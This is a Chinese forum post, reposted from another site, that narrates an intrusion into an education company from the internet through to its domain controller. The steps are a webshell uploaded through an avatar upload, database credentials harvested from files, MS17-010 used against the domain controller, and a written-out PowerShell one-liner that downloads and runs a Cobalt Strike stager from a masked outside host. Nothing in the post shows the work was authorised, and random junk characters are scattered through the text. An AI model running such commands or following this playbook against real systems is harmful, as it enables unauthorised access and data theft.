|
/ q) z# c+ n3 ?4 z Q7 u3 `
这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路
% w3 F: g C& u$ |) y- q" B
9 A# v; T3 Z4 _# t0 w. F
! h; Y0 i, j" a: b # F. L |7 l1 y" }' }
9 c. y* u( |1 g6 y& c
4 j$ q/ j, t7 @5 | 正文
" e- P$ s, t- w3 {! m
- K% ]& r/ G- g6 u( D+ L# R. x& N. b9 v- @* @
2 F- [7 y& D( I, `% g+ }3 W ! k& A; r6 J. S9 J- v% |: Q0 \
) P. r' h+ w( V
目标:www.xxxx.com(一家教育机构)
* \6 `& H+ ], E# x3 @打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能& i6 Y; n2 t$ H# k* k& S1 ?& ^
) v& r; [7 y8 q! o
) ^+ \6 {; n, B, D
- _, @6 b9 V8 R6 [; N7 ^. S
, j3 B4 g' B' p2 C* M4 Y/ L& r2 \! O+ z/ i( Z* h# {: Z5 J
进行了简单的信息搜集
' ~ S8 s+ y8 w5 K# z# Y+ o
- F9 ]& j3 p" R3 N0 r
( @$ p0 c1 a# p/ j# ~: S4 q6 ~
( _) R6 @5 |8 e/ U
% t. M" m1 s( j& ^! U 子域名搜集* ~ L$ `- m# r
7 j$ n: G l$ b. I# ~
+ @, ]8 l o, d! h8 ? k 
! Y& m) \* J5 l! o , x, N8 K( w2 f3 K
4 n1 i6 v/ ~9 f R/ ]7 \) Q* j
fofa找资产
, ^7 m8 x/ h1 q* V
8 E# i4 O3 B+ S2 g v) p" Q7 z
; z5 j, M$ ^4 N5 ^" I c' I+ y* J# L
" Z! Z) H8 a! ^
 - I# E" ~* {% t
- l' x+ U# f0 ?' Z3 T2 B
+ ^7 s) j% r- |4 ], t8 T. f1 t 一共七个资产。去重之后只有两个。
P* p/ p/ t1 H- {& w( k
2 `2 D3 B* S9 _9 T0 Q- S
9 M, L8 w2 j7 N! R" w
4 P3 j+ g2 ]6 \1 W. i8 X2 _/ @- F) m, j
目录探测$ t/ H" f$ f) [
& {7 |: W% k1 O5 [5 t
, f3 { c: y+ Y3 y! S& @* x 
* ]5 R6 D; a: F! W
! s% k0 V3 ]( W. |2 M# D6 u( }' V4 o+ {9 U+ m0 I9 j( z
我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
' W; r- d5 W$ q- f, ]
$ z, H( T/ t% ~; k8 V
( E3 E' q0 m2 x4 Y I K" s& i. U$ G
0 [( n# R2 @) B3 |9 i; A 我又尝试了通过修改返回包来绕过登录界面
3 c& h0 Y, A( Z% q( \ & }; m2 h0 F) x& Y
& V" s9 H0 R0 S3 V1 w% y 
- i$ Z$ {6 U, W( p
% o9 a$ i4 ?% y% z9 T3 Z
; `! S3 ~- Z, g* ^8 l' o 还是不行,尝试注入无果
8 _; V* `" V: `# k7 g8 \
$ J) z- Q- `! A k c' m! A& }: }. a5 F0 d0 h" X k
3 \ m% H5 |" o, N. O
" G o- f! R- E' ~5 r& W% ]$ S2 k5 t1 C$ m# W
不过我目录探测出了一处Spring信息泄露
, _/ Y8 N8 I9 Z6 z. ~) `
X( @9 f) k l
3 c/ A" I8 H6 l; `3 Y+ t" q- K
8 W" E, _! o9 V2 T# }+ K6 [+ @5 C! U1 i
 ) d4 M( A4 m. g
5 a$ s9 g3 k' t% A9 u2 A( C. l6 S) W X- V7 \
尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录
. j: R! W1 g) G- c# R
4 Z5 i: H I, \! ?. l1 p- [7 {# B4 s
$ c% R% ^9 J* c L1 ? * b0 U: F+ a9 _8 K* N
7 v- z# G. \7 g* r$ P& [
后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。
& ~8 p( V1 W7 O
) }" o! W! i- X( \& h! D: E0 z7 Y/ W: b6 A9 q0 P0 q M
+ @+ f8 y4 D1 }! W3 a7 V8 v % n1 {* R5 G3 k$ m% p* @9 d
. k) t, W/ H" I6 v2 r8 t+ f
获取有些师傅到这一步就手机抓包电脑测了。 @4 T2 u6 x, A0 \4 \. T
5 e: J# _* t7 n8 u1 L: ?$ n, ^9 r: F
Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。
4 N& s. t: L# ~& s L1 @# t ' }; v+ i5 r* C5 K7 m, m' {
0 Z0 \" _: Q+ z9 ` l& [
其中在一个公众号发现了小程序,可以进行注册。' [2 y: p: i- O& P) A! Z
3 x9 Z' J4 q& Y( h) v2 H2 Y1 o2 A
8 e1 U" f+ @! S9 {+ T$ X/ a3 J+ z1 m 看到了头像上传,尝试上传获取WebShell1 p$ A, _/ G0 x7 T' P
6 ^! e0 p( b2 Y. Z1 n# U8 K( |2 [ h+ k! ?1 Q' Y. E( m; b2 r
 . h* W6 G0 C% H. d4 I1 \
0 h2 f+ f" a, M0 o$ N. o7 o1 q# p, V& B* J! E
未做任何限制成功GetShell,上了冰蝎马,目录没权限访问
6 X2 q1 M1 d9 z ) k$ r U3 a0 D
# z9 R" ^1 J- f" @0 C  # j$ ]: T( ]1 R1 f. D& Z; P5 v
$ l. p' y+ ^& Z j4 D+ G8 R1 K9 ]) u! _. n @
然后上了大马* O7 q" o5 I- M0 H5 t
; l0 m7 g/ K+ j# O M5 \+ h9 K' `/ l2 e# F6 l% v1 w2 U
3 ^3 ^; U0 B, p: g ! H6 z: Z8 O* s1 J$ O
$ D* ?' ~/ @+ x) l! t 
6 A8 f( U3 [& ~; l 4 Q* F3 R# w% X( K. L* i
/ t& F3 v9 w5 `- s+ H3 A
通过翻找文件发现数据库账号密码 G8 |' u# d; X$ p- k; M
1 [* i6 e. T- f3 [5 C* P) g- n
# V8 e; Z0 O5 X1 C/ i; I. E& | 
+ y( b5 n+ r/ ^: {. T4 g: p( L2 R 8 u2 D; Y' i3 o* o, `
% K& q W; a H* M9 \! Y8 p) Q --内网渗透, N0 E6 g) `; z( g/ o+ r
* D u5 I% t1 c& B* u Y
, P) u2 c" C d# A 直接通过powershell执行 cs上线( r e0 e s Q$ R& x4 x7 B
6 i+ n$ J! ?( d9 a1 K/ i$ ]
6 V4 ^9 v8 Y* S6 V2 R8 e8 W! {3 s powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"
" \$ |- o; e6 }) z- {; [/ I
: {- S6 |3 g3 I! E8 U+ }5 N) s4 B& u( e( d0 q4 X/ V
2 ~* G A6 [. ?9 G1 ? 5 n& m W. B% {* ]
F9 L5 n6 C! [ p1 ]5 Z 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破
3 t, q% j/ X( b ) Y2 I! W9 O/ P
6 C, P) p Q, ^6 [ 
8 `( T* C7 _1 n# m) k: Y ! d4 |8 l- b* y' U' w5 H" r+ C
! b! E. [1 B* d$ N' N
登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
* l0 W' X, h9 D) y
/ d' O, x; C$ g0 B" @
' a. r8 H' N0 Q) R- l! P) d8 }) x; h7 m5 T% N
+ f; b" q: M6 }9 o# K3 J9 g3 d
; l: K- z/ ~/ n% _ 
9 {7 m! Z' u" w0 p3 k# |, T
. O- s# ~7 [1 Z: h( e8 e+ l5 b: P( Z' w% F# V. B. k
通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
F1 O* G2 }% w9 U# B
3 ^9 ~8 l8 A( p2 q- @7 t5 Y3 G7 p
# `* G# H" c1 ^# Y6 d, l
2 I5 H8 a2 j4 K  1 O2 O. W: r: m/ i- m; P: e/ q' z
: I2 A6 }' ]9 Q7 D
+ G% M a' t3 g, C9 n4 F
4 `) m }; \' ~" j0 g. S
+ S' ]- h, O0 L0 S) I" u
3 ?- Q' d& W; ]9 ?
+ u4 v# s( A1 I- H2 Z' r7 K" T% @ Z1 X7 `& h
/ p' ^. U8 ?: Q s4 C* r7 q9 P+ c3 c
* i2 H5 A, C( B! o5 {
& Y* @$ G0 g4 k/ v$ M' f
小结% F1 s3 M. w! n6 |, \! g# T \
' K4 b! e' y5 C( E0 |$ t* K2 ^6 ~2 j" J! e) U8 u" I
/ V* F* ~' D/ q6 f
- |' t% A/ F' a
6 t f8 J. {3 X! q9 A
在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!* ~. p/ B0 E; Z
( g% a# I' q5 R* J
' `9 l; ?- k( e: o' r0 o 3 V) s$ G9 m8 Y0 G
( [ N* g7 k$ l0 x# t- {; C: }/ R( v1 @
-
' b6 z) q5 U4 @- |! B Y9 W3 i
) Z4 M6 w: E7 Z6 b
8 b. ?& c5 `0 `: |3 o3 Q
-
( o" I: J1 p8 h% F9 s
6 T9 `( k) H0 f- |
2 m( P# n1 R9 j% M$ N7 R 2 o7 O$ P6 R9 Z4 I+ u
& V' m& o+ E6 A9 B* [5 o/ t1 C 作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html3 [/ E# {* c+ `* _/ _. E
6 W% X! _' ]" a$ J$ b! U
! w: U4 o, N% n
4 ^: E8 a0 W6 D) b T9 c | 
发表于 2024-3-1 19:41:32
收藏
支持
反对